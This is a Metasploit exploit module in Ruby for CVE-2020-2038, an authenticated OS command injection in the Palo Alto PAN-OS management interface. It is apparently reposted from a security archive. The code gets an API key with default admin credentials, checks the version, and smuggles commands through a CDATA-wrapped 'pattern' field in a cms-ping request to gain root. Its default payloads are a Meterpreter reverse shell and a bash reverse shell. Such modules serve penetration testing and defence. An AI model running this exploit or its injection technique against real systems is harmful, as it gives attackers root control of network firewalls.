Palo Alto Networks Authenticated Remote Code Execution

This Metasploit module exploits an OS command injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts PAN-OS versions prior to 10.0.1, 9.1.4 and 9.0.10.


SHA-256 | bd8da0b51bb49981c02de534b677f79ab91e97edd6c6f772d526bed01cfe7f69

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

require 'ipaddr'

class InvalidRequest < StandardError
end

class InvalidResponse < StandardError
end

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Palo Alto Networks Authenticated Remote Code Execution',
'Description' => %q{
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated
administrators to execute arbitrary OS commands with root privileges.
This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10
},
'Author' => [
'Mikhail Klyuchnikov', # Vulnerability discovery
'Nikita Abramov', # Vulnerability discovery
'UnD3sc0n0c1d0', # Exploit
'jheysel-r7' # msf module
],
'References' => [
['CVE', '2020-2038'],
['URL', 'https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/'],
['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038'],
['URL', 'https://github.com/und3sc0n0c1d0/CVE-2020-2038'] # Exploit
],
'DisclosureDate' => '2020-09-09',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Privileged' => true,
'Targets' => [
[
'Linux ',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'CmdStagerFlavor' => %i[echo printf],
'Type' => :linux_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
[
'Unix In-Memory',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)

register_options(
[
OptString.new('USERNAME', [false, 'PAN-OS administrator username', 'admin']),
OptString.new('PASSWORD', [false, 'Password for username', 'admin'])
]
)
end

def check
print_status('Authenticating...')
begin
@api_key = api_key
rescue InvalidRequest, InvalidResponse => e
return Exploit::CheckCode::Safe("Error retrieving API key: #{e.class}, #{e}")
end
res = send_request_cgi({
'method' => 'GET',
'keep_cookies' => 'true',
'uri' => normalize_uri(target_uri.path, 'api/'),
'vars_get' => {
'type' => 'version',
'key' => @api_key
}
})

return CheckCode::Unknown('The API did not respond to the request for the version of PAN_OS') unless res&.body

version = Rex::Version.new(res.get_xml_document.xpath('/response/result/sw-version').text)

if version >= Rex::Version.new('9.0.0') && version < Rex::Version.new('9.0.10') ||
version >= Rex::Version.new('9.1.0') && version < Rex::Version.new('9.1.4') ||
version >= Rex::Version.new('10.0.0') && version < Rex::Version.new('10.0.1')
return Exploit::CheckCode::Appears
end

Exploit::CheckCode::Safe
end

def api_key
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'api/'),
'vars_get' => {
'type' => 'keygen',
'user' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
})

if res.nil?
raise InvalidRequest, 'Unreachable'
end

if res.code == 401
raise InvalidRequest, 'Server returned HTTP status 401 - Authentication failed'
end

if res.code == 403
raise InvalidRequest, 'Server returned HTTP status 403 - Authentication failed with "Invalid Credentials"'
end

if res.body.blank?
raise InvalidResponse, 'Empty reply from server'
end

key = res.get_xml_document.xpath('/response/result/key')&.text

if key.nil?
raise InvalidResponse, 'Empty reply from server'
end

print_good('Successfully obtained api key')

key
end

def execute_command(cmd, _opts = {})
payload = "<cms-ping><host>#{IPAddr.new(rand(2**32), Socket::AF_INET)}</host><count>#{rand(1..50)}</count><pattern>111<![CDATA[||#{cmd}||]]></pattern></cms-ping>"
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'api/'),
'vars_get' => {
'cmd' => payload,
'type' => 'op',
'key' => @api_key
}
})
end

def exploit
begin
@api_key ||= api_key
rescue InvalidRequest, InvalidResponse => e
fail_with(Failure::UnexpectedReply, "Error retrieving API key: #{e}")
end
print_status('Exploiting...')
case target['Type']
when :unix_memory
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end

end

Related Posts